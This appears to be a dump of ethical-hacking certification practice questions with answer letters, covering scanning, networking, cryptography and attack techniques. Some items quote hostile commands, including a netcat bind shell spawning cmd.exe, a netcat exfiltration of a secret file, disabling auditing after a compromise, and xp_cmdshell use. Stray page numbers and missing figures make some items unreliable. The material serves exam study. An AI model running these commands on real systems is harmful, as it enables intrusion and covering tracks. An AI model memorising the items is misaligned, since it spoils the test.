382 Rebecca commonly sees an error on her Windows system that states that a Data Execution Prevention (DEP) error has taken place. Which of the following is most likely taking place? A. A race condition is being exploited, and the operating system is containing the malicious process. B. A page fault is occurring, which forces the operating system to write data from the hard drive C. Malware is executing in either ROM or a cache memory area. D. Malicious code is attempting to execute instruction in a non-executable memory region.

D

386 Websites and web portals that provide web services commonly use the Simple Object Access Protocol SOAP. Which of the following is an incorrect definition or characteristics in the protocol? A. Based on XML B. Provides a structured model for messaging C. Exchanges data between web services D. Only compatible with the application protocol HTTP

D

392 You are an Ethical Hacker who is auditing the ABC company. When you verify the NOC one of the machines has 2 connections, one wired and the other wireless. When you verify the configuration of this Windows system you find two static routes. route add 10.0.0.0 mask 255.0.0.0 10.0.0.1 route add 0.0.0.0 mask 255.0.0.0 199.168.0.1 What is the main purpose of those static routes? A. Both static routes indicate that the traffic is external with different gateway. B. The first static route indicates that the internal traffic will use an external gateway and the second static route indicates that the traffic will be rerouted. C. Both static routes indicate that the traffic is internal with different gateway. D. The first static route indicates that the internal addresses are using the internal gateway and the second static route indicates that all the traffic that is not internal must go to an external gateway.

D

393 What is the correct process for the TCP three-way handshake connection establishment and connection termination? A. Connection Establishment: FIN, ACK-FIN, ACK Connection Termination: SYN, SYN-ACK, ACK B. Connection Establishment: SYN, SYN-ACK, ACK Connection Termination: ACK, ACK-SYN, SYN C. Connection Establishment: ACK, ACK-SYN, SYN Connection Termination: FIN, ACK-FIN, ACK D. Connection Establishment: SYN, SYN-ACK, ACK Connection Termination: FIN, ACK-FIN, ACK

D

399 Which of the following Nmap commands will produce the following output? Output: Starting Nmap 6.47 (http://nmap.org ) at 2015-05-26 12:50 EDT Nmap scan report for 192.168.1.1 Host is up (0.00042s latency). Not shown: 65530 open|filtered ports, 65529 filtered ports PORT STATE SERVICE 111/tcp open rpcbind 999/tcp open garcon 1017/tcp open unknown 1021/tcp open exp1 1023/tcp open netvenuechat 2049/tcp open nfs 17501/tcp open unknown 111/udp open rpcbind 123/udp open ntp 137/udp open netbios-ns 2049/udp open nfs 5353/udp open zeroconf 17501/udp open|filtered unknown 51857/udp open|filtered unknown 54358/udp open|filtered unknown 56228/udp open|filtered unknown 57598/udp open|filtered unknown 59488/udp open|filtered unknown 60027/udp open|filtered unknown A. nmap -sN -Ps -T4 192.168.1.1 B. nmap -sT -sX -Pn -p 1-65535 192.168.1.1 C. nmap -sS -Pn 192.168.1.1 D. nmap -sS -sU -Pn -p 1-65535 192.168.1.1

D

400 In an attempt to secure his 802.11b wireless network, Ulf decides to use a strategic antenna positioning. He places the antenna for the access points near the center of the building. For those access points near the outer edge of the building he uses semi-directional antennas that face towards the building's center. There is a large parking lot and outlying filed surrounding the building that extends out half a mile around the building. Ulf figures that with this and his placement of antennas, his wireless network will be safe from attack. Which of the following statements is true? A. With the 300 feet limit of a wireless signal, Ulf's network is safe. B. Wireless signals can be detected from miles away, Ulf's network is not safe. C. Ulf's network will be safe but only of he doesn't switch to 802.11a. D. Ulf's network will not be safe until he also enables WEP.

D

401 You want to do an ICMP scan on a remote computer using hping2. What is the proper syntax? A. hping2 host.domain.com B. hping2 --set-ICMP host.domain.com C. hping2 -i host.domain.com D. hping2 -1 host.domain.com

D

402 Which of the following is a passive wireless packet analyzer that works on Linux-based systems? A. Burp Suite B. OpenVAS C. tshark D. Kismet

D

403 The establishment of a TCP connection involves a negotiation called 3 way handshake. What type of message sends the client to the server in order to begin this negotiation? A. RST B. ACK C. SYN-ACK D. SYN

D

407 Look at the following output. What did the hacker accomplish? ; <<>> DiG 9.7.-P1 <<>> axfr domam.com @192.168.1.105 ;; global options: +cmd domain.com. 3600 IN SOA srv1.domain.com. hostsrv1.domain.com. 131 900 600 86400 3600 domain.com. 600 IN A 192.168.1.102 domain.com. 600 IN A 192.168.1.105 domain.com. 3600 IN NS srv1.domain.com. domain.com. 3600 IN NS srv2.domain.com. vpn.domain.com. 3600 IN A 192.168.1.1 server.domain.com. 3600 IN A 192.168.1.3 office.domain.com. 3600 IN A 192.168.1.4 remote.domain.com. 3600 IN A 192.168. 1.48 support.domain.com. 3600 IN A 192.168.1.47 ns1.domain.com. 3600 IN A 192.168.1.41 ns2.domain.com. 3600 IN A 192.168.1.42 ns3.domain.com. 3600 IN A 192.168.1.34 ns4.domain.com. 3600 IN A 192.168.1.45 srv1.domain.com. 3600 IN A 192.168.1.102 srv2.domain.com. 1200 IN A 192.168.1.105 domain.com. 3600 INSOA srv1.domain.com. hostsrv1.domain.com. 131 900 600 86400 3600 ;; Query time: 269 msec ;; SERVER: 192.168.1.105#53(192.168.1.105) ;; WHEN: Sun Aug 11 20:07:59 2013 ;; XFR size: 65 records (messages 65, bytes 4501) A. The hacker used whois to gather publicly available records for the domain. B. The hacker used the "fierce" tool to brute force the list of available domains. C. The hacker listed DNS records on his own domain. D. The hacker successfully transfered the zone and enumerated the hosts.

D

409 Scenario: Victim opens the attacker's web sitE. Attacker sets up a web site which contains interesting and attractive content like 'Do you want to make $1000 in a day?'. Victim clicks to the interesting and attractive content url. Attacker creates a transparent 'iframe' in front of the url which victim attempt to click, so victim thinks that he/she clicks to the 'Do you want to make $1000 in a day?' url but actually he/she clicks to the content or url that exists in the transparent 'iframe' which is setup by the attacker. What is the name of the attack which is mentioned in the scenario? A. HTTP Parameter Pollution B. HTML Injection C. Session Fixation D. ClickJacking Attack

D

419 Which of the following programming languages is most susceptible to buffer overflow attacks, due to its lack of a built-in-bounds checking mechanism? Code: #include <string.h> int main(){ 241 char buffer[8]; strcpy(buffer, ""11111111111111111111111111111""); } Output: Segmentation fault A. C# B. Python C. Java D. C++

D

430 Which access control mechanism allows for multiple systems to use a central authentication server (CAS) that permits users to authenticate once and gain access to multiple systems? A. Role Based Access Control (RBAC) B. Discretionary Access Control (DAC) C. Windows authentication D. Single sign-on

D

433 Shellshock had the potential for an unauthorized user to gain access to a server. It affected many internet-facing services, which OS did it not directly affect? A. Windows B. Unix C. Linux D. OS X

D

442 Which of the following is an NMAP script that could help detect HTTP Methods such as GET, POST, HEAD, PUT, DELETE, TRACE? A. http-git B. http-headers C. http enum D. http-methods

D

443 Which of the following is the most important phase of ethical hacking wherein you need to spend considerable amount of time? A. Gaining access B. Escalating privileges C. Network mapping D. Footprinting

D

447 What is the approximate cost of replacement and recovery operation per year of a hard drive that has a value of $300 given that the technician who charges $10/hr would need 10 hours to restore OS and Software and needs further 4 hours to restore the database from the last backup to the new hard disk? Calculate the SLE, ARO, and ALE. Assume the EF = 1 (100%). A. $440 B. $100 C. $1320 D. $146

D

457 Backing up data is a security must. However, it also have certain level of risks when mishandleD. Which of the following is the greatest threat posed by backups? A. A backup is the source of Malware or illicit information B. A backup is incomplete because no verification was performed C. A backup is unavailable during disaster recovery D. An unencrypted backup can be misplaced or stolen

D

46 Which of the following is a symmetric cryptographic standard? A. DSA B. PKI C. RSA D. 3DES

D

469 In order to prevent particular ports and applications from getting packets into an organization, what does a firewall check? A. Network layer headers and the session layer port numbers B. Presentation layer headers and the session layer port numbers C. Application layer port numbers and the transport layer headers D. Transport layer port numbers and application layer headers

D

473 XOR is a common cryptographic tool. 10110001 XOR 00111010 is? A. 10111100 B. 11011000 C. 10011101 D. 10001011

D

478 Which of the following BEST describes how Address Resolution Protocol (ARP) works? A. It sends a reply packet for a specific IP, asking for the MAC address B. It sends a reply packet to all the network elements, asking for the MAC address from a specific IP C. It sends a request packet to all the network elements, asking for the domain name from a specific IP D. It sends a request packet to all the network elements, asking for the MAC address from a specific IP

D

500 Supposed you are the Chief Network Engineer of a certain Telco. Your company is planning for a big business expansion and it requires that your network authenticate users connecting using analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay network. Which AAA protocol would you implement? A. TACACS+ B. DIAMETER C. Kerberos D. RADIUS

D

501 Which type of cryptography does SSL, IKE and PGP belongs to? A. Secret Key B. Hash Algorithm C. Digest D. Public Key

D

504 A program that defends against a port scanner will attempt to: A. Sends back bogus data to the port scanner B. Log a violation and recommend use of security-auditing tools C. Limit access by the scanning system to publicly available ports only D. Update a firewall rule in real time to prevent the port scan from being completed

D

520 You have been using the msadc.pl attack script to execute arbitrary commands on an NT4 web server. While it is effective, you find it tedious to perform extended functions. On further research you come across a perl script that runs the following msadc functions: What kind of exploit is indicated by this script? 316 A. A buffer overflow exploit. B. A SUID exploit. C. A SQL injection exploit. D. A chained exploit. E. A buffer under run exploit.

D

544 Annie has just succeeded in stealing a secure cookie via a XSS attack. She is able to replay the cookie even while the session is valid on the server. Why do you think this is possible? 331 A. Any cookie can be replayed irrespective of the session status B. The scenario is invalid as a secure cookie cannot be replayed C. It works because encryption is performed at the network layer (layer 1 encryption) D. It works because encryption is performed at the application layer (single encryption key)

D

56 Which of the following scanning tools is specifically designed to find potential exploits in Microsoft Windows products? A. Microsoft Security Baseline Analyzer B. Retina C. Core Impact D. Microsoft Baseline Security Analyzer

D

588 Darren is the network administrator for Greyson & Associates, a large law firm in Houston. Darren 355 is responsible for all network functions as well as any digital forensics work that is needed. Darren is examining the firewall logs one morning and notices some unusual activity. He traces the activity target to one of the firm's internal file servers and finds that many documents on that server were destroyed. After performing some calculations, Darren finds the damage to be around $75,000 worth of lost data. Darren decides that this incident should be handled and resolved within the same day of its discovery. What incident level would this situation be classified as? A. This situation would be classified as a mid-level incident B. Since there was over $50,000 worth of loss, this would be considered a high-level incident C. Because Darren has determined that this issue needs to be addressed in the same day it was discovered, this would be considered a low-level incident D. This specific incident would be labeled as an immediate-level incident

D

59 Which of the following processes evaluates the adherence of an organization to its stated security policy? A. Vulnerability assessment B. Penetration testing C. Risk assessment D. Security auditing

D

592 Jason works in the sales and marketing department for a very large advertising agency located in Atlanta. Jason is working on a very important marketing campaign for his company's largest client. Before the project could be completed and implemented, a competing advertising company comes out with the exact same marketing materials and advertising, thus rendering all the work done for Jason's client unusable. Jason is questioned about this and says he has no idea how all the material ended up in the hands of a competitor. Without any proof, Jason's company cannot do anything except move on. After working on another high profile client for about a month, all the marketing and sales material again ends up in the hands of another competitor and is released to the public before Jason's company can finish the project. Once again, Jason says that he had nothing to do with it and does not know how this could have happened. Jason is given leave with pay until they can figure out what is going on. Jason's supervisor decides to go through his email and finds a number of emails that were sent to the competitors that ended up with the marketing material. The only items in the emails were attached jpg files, but nothing else. Jason's supervisor opens the picture files, but cannot find anything out of the ordinary with them. What technique has Jason most likely used? A. Stealth Rootkit Technique B. Snow Hiding Technique C. ADS Streams Technique D. Image Steganography Technique

D

602 You are the chief information officer for your company, a shipping company based out of Oklahoma City. You are responsible for network security throughout the home office and all branch offices. You have implemented numerous layers of security from logical to physical. As part of your procedures, you perform a yearly network assessment which includes vulnerability analysis, internal network scanning, and external penetration tests. Your main concern currently is the server in the DMZ which hosts a number of company websites. To see how the server appears to external users, you log onto a laptop at a Wi-Fi hot spot. Since you already know the IP address of the web server, you create a telnet session to that server and type in the command: HEAD /HTTP/1.0 After typing in this command, you are presented with the following screen: What are you trying to do here? A. You are attempting to send an html file over port 25 to the web server. B. By typing in the HEAD command, you are attempting to create a buffer overflow on the web server. C. You are trying to open a remote shell to the web server. D. You are trying to grab the banner of the web server. *

D

603 Josh is the network administrator for Consultants Galore, an IT consulting firm based in Kansas City. Josh is responsible for the company's entire network which consists of one Windows Server 2003 Active Directory domain. Almost all employees have Remote Desktop access to the servers so they can perform their work duties. Josh has created a security group in Active Directory called "RDP Deny" which contains all the user accounts that should not have Remote Desktop permission to any of the servers. What Group Policy change can Jayson make to ensure that all users in the "RDP Deny" group cannot access the company servers through Remote Desktop? 364 A. Josh should add the "RDP Deny" group into the list of Restricted Groups to prevent the users from accessing servers remotely. B. By adding the "RDP Deny" group to the "Deny logon as a service" policy, the users in that security group will not be able to establish remote connections to any of the servers. C. He should add the "RDP Deny" group to the "Deny RDP connections to member servers" policy. D. Josh needs to add the "RDP Deny" group to the "Deny logon through Terminal Services" policy. *

D

612 You are the security administrator of Jaco Banking Systems located in Boston. You are setting up e-banking website (http://www.ejacobank.com) authentication system. Instead of issuing banking customer with a single password, you give them a printed list of 100 unique passwords. Each time the customer needs to log into the e-banking system website, the customer enters the next password on the list. If someone sees them type the password using shoulder surfing, MiTM or keyloggers, then no damage is done because the password will not be accepted a second time. Once the list of 100 passwords is almost finished, the system automatically sends out a new password list by encrypted e-mail to the customer. You are confident that this security implementation will protect the customer from password abuse. Two months later, a group of hackers called "HackJihad" found a way to access the one-time password list issued to customers of Jaco Banking Systems. The hackers set up a fake website (http://www.e-jacobank.com) and used phishing attacks to direct ignorant customers to it. The fake website asked users for their e-banking username and password, and the next unused entry from their one-time password sheet. The hackers collected 200 customer's username/passwords this way. They transferred money from the customer's bank account to various offshore accounts. Your decision of password policy implementation has cost the bank with USD 925,000 to hackers. You immediately shut down the e-banking website while figuring out the next best security solution What effective security solution will you recommend in this case? A. Implement Biometrics based password authentication system. Record the customers face image to the authentication database B. Configure your firewall to block logon attempts of more than three wrong tries C. Enable a complex password policy of 20 characters and ask the user to change the password immediately after they logon and do not store password histories D. Implement RSA SecureID based authentication system

D

613 Which of the following type of scanning utilizes automated process of proactively identifying vulnerabilities of the computing systems present on a network? A. Port Scanning B. Single Scanning C. External Scanning D. Vulnerability Scanning

D

619 Vulnerability scanners are automated tools that are used to identify vulnerabilities and misconfigurations of hosts. They also provide information regarding mitigating discovered vulnerabilities. Which of the following statements is incorrect? A. Vulnerability scanners attempt to identify vulnerabilities in the hosts scanned. B. Vulnerability scanners can help identify out-of-date software versions, missing patches, or system upgrades C. They can validate compliance with or deviations from the organization's security policy D. Vulnerability scanners can identify weakness and automatically fix and patch the vulnerabilities 374 without user intervention

D

62 What is the main reason the use of a stored biometric is vulnerable to an attack? A. The digital representation of the biometric might not be unique, even if the physical characteristic is unique. B. Authentication using a stored biometric compares a copy to a copy instead of the original to a copy. C. A stored biometric is no longer "something you are" and instead becomes "something you have". D. A stored biometric can be stolen and used by an attacker to impersonate the individual identified by the biometric.

D

625 Jayden is a network administrator for her company. Jayden wants to prevent MAC spoofing on all the Cisco switches in the network. How can she accomplish this? A. Jayden can use the command: ip binding set. B. Jayden can use the command: no ip spoofing. C. She should use the command: no dhcp spoofing. 377 - - D. She can use the command: ip dhcp snooping binding.

D

629 Syslog is a standard for logging program messages. It allows separation of the software that generates messages from the system that stores them and the software that reports and analyzes them. It also provides devices, which would otherwise be unable to communicate a means to notify administrators of problems or performance. What default port Syslog daemon listens on? A. 242 B. 312 C. 416 D. 514

D

631 What is the correct command to run Netcat on a server using port 56 that spawns command shell when connected? A. nc -port 56 -s cmd.exe B. nc -p 56 -p -e shell.exe C. nc -r 56 -c cmd.exe D. nc -L 56 -t -e cmd.exe

D

640 A rootkit is a collection of tools (programs) that enable administrator-level access to a computer. This program hides itself deep into an operating system for malicious activity and is extremely difficult to detect. The malicious software operates in a stealth fashion by hiding its files, processes and registry keys and may be used to create a hidden directory or folder designed to keep out of view from a user's operating system and security software. 386 What privilege level does a rootkit require to infect successfully on a Victim's machine? A. User level privileges B. Ring 3 Privileges C. System level privileges D. Kernel level privileges

D

642 Cyber Criminals have long employed the tactic of masking their true identity. In IP spoofing, an 387 attacker gains unauthorized access to a computer or a network by making it appear that a malicious message has come from a trusted machine, by "spoofing" the IP address of that machine. How would you detect IP spoofing? A. Check the IPID of the spoofed packet and compare it with TLC checksum. If the numbers match then it is spoofed packet B. Probe a SYN Scan on the claimed host and look for a response SYN/FIN packet, if the connection completes then it is a spoofed packet C. Turn on 'Enable Spoofed IP Detection' in Wireshark, you will see a flag tick if the packet is spoofed D. Sending a packet to the claimed host will result in a reply. If the TTL in the reply is not the same as the packet being checked then it is a spoofed packet

D

643 David is a security administrator working in Boston. David has been asked by the office's manager to block all POP3 traffic at the firewall because he believes employees are spending too much time reading personal email. How can David block POP3 at the firewall? A. David can block port 125 at the firewall. B. David can block all EHLO requests that originate from inside the office. C. David can stop POP3 traffic by blocking all HELO requests that originate from inside the office. D. David can block port 110 to block all POP3 traffic.

D

645 XSS attacks occur on Web pages that do not perform appropriate bounds checking on data entered by users. Characters like < > that mark the beginning/end of a tag should be converted into HTML entities. What is the correct code when converted to html entities? 389 A. Option A B. Option B C. Option C D. Option D

D

649 Maintaining a secure Web server requires constant effort, resources, and vigilance from an organization. Securely administering a Web server on a daily basis is an essential aspect of Web server security. Maintaining the security of a Web server will usually involve the following steps: 1. Configuring, protecting, and analyzing log files 392 2. Backing up critical information frequently 3. Maintaining a protected authoritative copy of the organization's Web content 4. Establishing and following procedures for recovering from compromise 5. Testing and applying patches in a timely manner 6. Testing security periodically. In which step would you engage a forensic investigator? A. 1 B. 2 C. 3 D. 4 E. 5 F. 6

D

655 Attacking well-known system defaults is one of the most common hacker attacks. Most software is shipped with a default configuration that makes it easy to install and setup the application. You should change the default settings to secure the system. Which of the following is NOT an example of default installation? A. Many systems come with default user accounts with well-known passwords that administrators forget to change B. Often, the default location of installation files can be exploited which allows a hacker to retrieve a file from the system C. Many software packages come with "samples" that can be exploited, such as the sample programs on IIS web services D. Enabling firewall and anti-virus software on the local system

D

665 You are the CIO for Avantes Finance International, a global finance company based in Geneva. You are responsible for network functions and logical security throughout the entire corporation. Your company has over 250 servers running Windows Server, 5000 workstations running Windows Vista, and 200 mobile users working from laptops on Windows 7. Last week, 10 of your company's laptops were stolen from salesmen while at a conference in Amsterdam. These laptops contained proprietary company information. While doing damage assessment on the possible public relations nightmare this may become, a news story leaks about the stolen laptops and also that sensitive information from those computers was posted to a blog online. What built-in Windows feature could you have implemented to protect the sensitive information on these laptops? A. You should have used 3DES which is built into Windows B. If you would have implemented Pretty Good Privacy (PGP) which is built into Windows, the sensitive information on the laptops would not have leaked out C. You should have utilized the built-in feature of Distributed File System (DFS) to protect the sensitive information on the laptops D. You could have implemented Encrypted File System (EFS) to encrypt the sensitive files on the laptops 403

D

67 Which of the following conditions must be given to allow a tester to exploit a Cross-Site Request Forgery (CSRF) vulnerable web application? A. The victim user must open the malicious link with an Internet Explorer prior to version 8. B. The session cookies generated by the application do not have the HttpOnly flag set. C. The victim user must open the malicious link with a Firefox prior to version 3. D. The web application should not use random tokens.

D

670 You are gathering competitive intelligence on an organization. You notice that they have jobs listed on a few Internet job-hunting sites. There are two jobs for network and system administrators. How can this help you in foot printing the organization? A. To learn about the IP range used by the target network B. To identify the number of employees working for the company C. To test the limits of the corporate security policy enforced in the company D. To learn about the operating systems, services and applications used on the network

D

678 Harold works for Jacobson Unlimited in the IT department as the security manager. Harold has created a security policy requiring all employees to use complex 14 character passwords. Unfortunately, the members of management do not want to have to use such long complicated passwords so they tell Harold's boss this new password policy should not apply to them. To comply with the management's wishes, the IT department creates another Windows domain and moves all the management users to that domain. This new domain has a password policy only requiring 8 characters. Harold is concerned about having to accommodate the managers, but cannot do anything about it. Harold is also concerned about using LanManager security on his network instead of NTLM or NTLMv2, but the many legacy applications on the network prevent using the more secure NTLM and NTLMv2. Harold pulls the SAM files from the DC's on the original domain and the new domain using Pwdump6. Harold uses the password cracking software John the Ripper to crack users' passwords to make sure they are strong enough. Harold expects that the users' passwords in the original domain will take much longer to crack than the management's passwords in the new domain. After running the software, Harold discovers that the 14 character passwords only took a short time longer to crack than the 8 character passwords. Why did the 14 character passwords not take much longer to crack than the 8 character passwords? A. Harold should have used Dumpsec instead of Pwdump6 B. Harold's dictionary file was not large enough C. Harold should use LC4 instead of John the Ripper D. LanManger hashes are broken up into two 7 character fields

D

679 You establish a new Web browser connection to Google. Since a 3-way handshake is required for any TCP connection, the following actions will take place. DNS query is sent to the DNS server to resolve www.google.com DNS server replies with the IP address for Google? SYN packet is sent to Google. Google sends back a SYN/ACK packet Your computer completes the handshake by sending an ACK The connection is established and the transfer of data commences Which of the following packets represent completion of the 3-way handshake? A. 4th packet B. 3rdpacket C. 6th packet 411 D. 5th packet

D

68 What is the main difference between a "Normal" SQL Injection and a "Blind" SQL Injection vulnerability? A. The request to the web server is not visible to the administrator of the vulnerable application. B. The attack is called "Blind" because, although the application properly filters user input, it is still vulnerable to code injection. C. The successful attack does not show an error message to the administrator of the affected application. D. The vulnerable application does not display errors with information about the injection results to the attacker.

D

684 Fred is scanning his network to ensure it is as secure as possible. Fred sends a TCP probe packet to a host with a FIN flag and he receives a RST/ACK response. What does this mean? A. This response means the port he is scanning is open. B. The RST/ACK response means the port Fred is scanning is disabled. C. This means the port he is scanning is half open. D. This means that the port he is scanning on the host is closed.

D

686 You have successfully gained access to a victim's computer using Windows 2003 Server SMB Vulnerability. Which command will you run to disable auditing from the cmd? A. stoplog stoplog ? B. EnterPol /nolog C. EventViewer o service D. auditpol.exe /disable

D

687 How do you defend against MAC attacks on a switch? A. Disable SPAN port on the switch B. Enable SNMP Trap on the switch C. Configure IP security on the switch D. Enable Port Security on the switch

D

69 During a penetration test, a tester finds a target that is running MS SQL 2000 with default credentials. The tester assumes that the service is running with Local System account. How can this weakness be exploited to access the system? A. Using the Metasploit psexec module setting the SA / Admin credential B. Invoking the stored procedure xp_shell to spawn a Windows command shell C. Invoking the stored procedure cmd_shell to spawn a Windows command shell D. Invoking the stored procedure xp_cmdshell to spawn a Windows command shell

D

690 NetBIOS over TCP/IP allows files and/or printers to be shared over the network. You are trying to intercept the traffic from a victim machine to a corporate network printer. You are attempting to hijack the printer network connection from your laptop by sniffing the wire. Which port does SMB over TCP/IP use? A. 443 B. 139 C. 179 D. 445

D

694 Attackers send an ACK probe packet with random sequence number, no response means port is filtered (Stateful firewall is present) and RST response means the port is not filtered. What type of Port Scanning is this? 417 A. RST flag scanning B. FIN flag scanning C. SYN flag scanning D. ACK flag scanning

D

696 What is the IV key size used in WPA2? A. 32 B. 24 C. 16 418 D. 48 E. 128

D

698 What is the default Password Hash Algorithm used by NTLMv2? A. MD4 B. DES C. SHA-1 D. MD5

D

700 An Attacker creates a zuckerjournals.com website by copying and mirroring HACKERJOURNALS.COM site to spread the news that Hollywood actor Jason Jenkins died in a car accident. The attacker then submits his fake site for indexing in major search engines. When users search for "Jason Jenkins", attacker's fake site shows up and dupes victims by the fake news. 420 This is another great example that some people do not know what URL's are. Real website: Fake website: http://www.zuckerjournals.com 421 The website is clearly not WWW.HACKERJOURNALS.COM. It is obvious for many, but unfortunately some people still do not know what an URL is. It's the address that you enter into the address bar at the top your browser and this is clearly not legit site, its www.zuckerjournals.com How would you verify if a website is authentic or not? A. Visit the site using secure HTTPS protocol and check the SSL certificate for authenticity B. Navigate to the site by visiting various blogs and forums for authentic links C. Enable Cache on your browser and lookout for error message warning on the screen D. Visit the site by clicking on a link from Google search engine

D

81 Sandra is the security administrator of ABC.com. One day she notices that the ABC.com Oracle database server has been compromised and customer information along with financial data has been stolen. The financial loss will be estimated in millions of dollars if the database gets into the hands of competitors. Sandra wants to report this crime to the law enforcement agencies immediately. 48 Which organization coordinates computer crime investigations throughout the United States? A. NDCA B. NICP C. CIRP D. NPC E. CIA

D

82 A network administrator received an administrative alert at 3:00 a.m. from the intrusion detection system. The alert was generated because a large number of packets were coming into the network over ports 20 and 21. During analysis, there were no signs of attack on the FTP servers. How should the administrator classify this situation? A. True negatives B. False negatives C. True positives D. False positives

D

83 Which of the following techniques does a vulnerability scanner use in order to detect a vulnerability on a target service? A. Port scanning B. Banner grabbing C. Injecting arbitrary data D. Analyzing service response

D

84 Which of the following business challenges could be solved by using a vulnerability scanner? A. Auditors want to discover if all systems are following a standard naming convention. B. A web server was compromised and management needs to know if any further systems were compromised. C. There is an emergency need to remove administrator access from multiple machines for an employee that quit. D. There is a monthly requirement to test corporate compliance with host application usage and security policies.

D

86 A company has hired a security administrator to maintain and administer Linux and Windows based systems. Written in the nightly report file is the following: Firewall log files are at the expected value of 4 MB. The current time is 12am. Exactly two hours later the size has ecreased considerably. Another hour goes by and the log files have shrunk in size again. Which of the following actions should the security administrator take? A. Log the event as suspicious activity and report this behavior to the incident response team immediately. B. Log the event as suspicious activity, call a manager, and report this as soon as possible. C. Run an anti-virus scan because it is likely the system is infected by malware. D. Log the event as suspicious activity, continue to investigate, and act according to the site's security policy.

D

98 Study the log below and identify the scan type. tcpdump -vv host 192.168.1.10 17:34:45.802163 eth0 < 192.168.1.1 > victim: ip-proto-117 0 (ttl 48, id 36166) 17:34:45.802216 eth0 < 192.168.1.1 > victim: ip-proto-25 0 (ttl 48, id 33796) 17:34:45.802266 eth0 < 192.168.1.1 > victim: ip-proto-162 0 (ttl 48, id 47066) 17:34:46.111982 eth0 < 192.168.1.1 > victim: ip-proto-74 0 (ttl 48, id 35585) 17:34:46.112039 eth0 < 192.168.1.1 > victim: ip-proto-117 0 (ttl 48, id 32834) 17:34:46.112092 eth0 < 192.168.1.1 > victim: ip-proto-25 0 (ttl 48, id 26292) 58 17:34:46.112143 eth0 < 192.168.1.1 > victim: ip-proto-162 0 (ttl 48, id 51058) tcpdump -vv -x host 192.168.1.10 17:35:06.731739 eth0 < 192.168.1.10 > victim: ip-proto-130 0 (ttl 59, id 42060) 4500 0014 a44c 0000 3b82 57b8 c0a8 010a c0a8 0109 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 A. nmap -sR 192.168.1.10 B. nmap -sS 192.168.1.10 C. nmap -sV 192.168.1.10 D. nmap -sO -T 192.168.1.10

D

98 An organization hires a tester to do a wireless penetration test. Previous reports indicate that the last test did not contain management or control packets in the submitted traces. Which of the following is the most likely reason for lack of management or control packets? A. The wireless card was not turned on. B. The wrong network card drivers were in use by Wireshark. C. On Linux and Mac OS X, only 802.11 headers are received in promiscuous mode. D. Certain operating systems and adapters do not collect the management or control packets.

D

118 You are scanning the target network for the first time. You are able to detect few convention open ports. While attempting to perform conventional service identification by 69 connecting to the open ports, the scan yields either bad or no result. As you are unsure of the protocols in use, you want to discover as many different protocols as possible. Which of the following scan options can help you achieve this? A. Nessus sacn with TCP based pings B. Netcat scan with the switches C. Nmap scan with the P (ping scan) switch D. Nmap with the O (Raw IP Packets switch

D (Explanation: -sO IP protocol scans: This method is used to determine which IP protocols are supported on a host. The technique is to send raw IP packets without any further protocol header to each specified protocol on the target machine. If we receive an ICMP protocol unreachable message, then the protocol is not in use. Otherwise we assume it is open. Note that some hosts (AIX, HPUX, Digital UNIX) and firewalls may not send protocol unreachable messages.)

566 One of the better features of NetWare is the use of packet signature that includes cryptographic signatures. The packet signature mechanism has four levels from 0 to 3. In the list below which of the choices represent the level that forces NetWare to sign all packets? A. 0 (zero) B. 1 343 C. 2 D. 3

D (Explanation: 0Server does not sign packets (regardless of the client level). 1Server signs packets if the client is capable of signing (client level is 2 or higher). 2Server signs packets if the client is capable of signing (client level is 1 or higher). 3Server signs packets and requires all clients to sign packets or logging in will fail.)

287 A Buffer Overflow attack involves: A. Using a trojan program to direct data traffic to the target host's memory stack B. Flooding the target network buffers with data traffic to reduce the bandwidth available to legitimate users C. Using a dictionary to crack password buffers by guessing user names and passwords D. Poorly written software that allows an attacker to execute arbitrary code on a target system

D (Explanation: B is a denial of service. By flooding the data buffer in an application with trash you could get access to write in the code segment in the application and that way insert your own code.)

462 Which one of the following attacks will pass through a network layer intrusion detection system undetected? A. A teardrop attack B. A SYN flood attack C. A DNS spoofing attack D. A test.cgi attack

D (Explanation: Because a network-based IDS reviews packets and headers, it can also detect denial of service (DoS) attacks Not A or B: The following sections discuss some of the possible DoS attacks available. Smurf Fraggle SYN Flood Teardrop DNS DoS Attacks")

537 An attacker runs netcat tool to transfer a secret file between two hosts. Machine A: netcat -1 -p 1234 < secretfile 327 Machine B: netcat 192.168.3.4 > 1234 He is worried about information being sniffed on the network. How would the attacker use netcat to encrypt information before transmitting it on the wire? A. Machine A: netcat -1 -p -s password 1234 < testfile Machine B: netcat <machine A IP> 1234 B. Machine A: netcat -1 -e magickey -p 1234 < testfile Machine B: netcat <machine A IP> 1234 C. Machine A: netcat -1 -p 1234 < testfile -pw password Machine B: netcat <machine A IP> 1234 -pw password D. Use cryptcat instead of netcat.

D (Explanation: Cryptcat is the standard netcat enhanced with twofish encryption with ports for WIndows NT, BSD and Linux. Twofish is courtesy of counterpane, and cryptix. A default netcat installation does not contain any cryptography support.)

338 You are gathering competitive intelligence on ABC.com. You notice that they have jobs 201 listed on a few Internet job-hunting sites. There are two job postings for network and system administrators. How can this help you in footprint the organization? A. The IP range used by the target network B. An understanding of the number of employees in the company C. How strong the corporate security policy is D. The types of operating systems and applications being used.

D (Explanation: From job posting descriptions one can see which is the set of skills, technical knowledge, system experience required, hence it is possible to argue what kind of operating systems and applications the target organization is using.)

395 Sandra is conducting a penetration test for ABC.com. She knows that ABC.com is using wireless networking for some of the offices in the building right down the street. Through social engineering she discovers that they are using 802.11g. Sandra knows that 802.11g uses the same 2.4GHz frequency range as 802.11b. Using NetStumbler and her 802.11b wireless NIC, Sandra drives over to the building to map the wireless networks. However, even though she repositions herself around the building several times, Sandra is not able to detect a single AP. What do you think is the reason behind this? A. Netstumbler does not work against 802.11g. B. You can only pick up 802.11g signals with 802.11a wireless cards. C. The access points probably have WEP enabled so they cannot be detected. D. The access points probably have disabled broadcasting of the SSID so they cannot be detected. E. 802.11g uses OFDM while 802.11b uses DSSS so despite the same frequency and 802.11b card cannot see an 802.11g signal. F. Sandra must be doing something wrong, as there is no reason for her to not see the signals.

D (Explanation: Netstumbler can not detect networks that do not respond to broadcast requests.)

500 Eric notices repeated probes to port 1080. He learns that the protocol being used is designed to allow a host outside of a firewall to connect transparently and securely through the firewall. He wonders if his firewall has been breached. What would be your inference? 303 A. Eric network has been penetrated by a firewall breach B. The attacker is using the ICMP protocol to have a covert channel C. Eric has a Wingate package providing FTP redirection on his network D. Somebody is using SOCKS on the network to communicate through the firewall

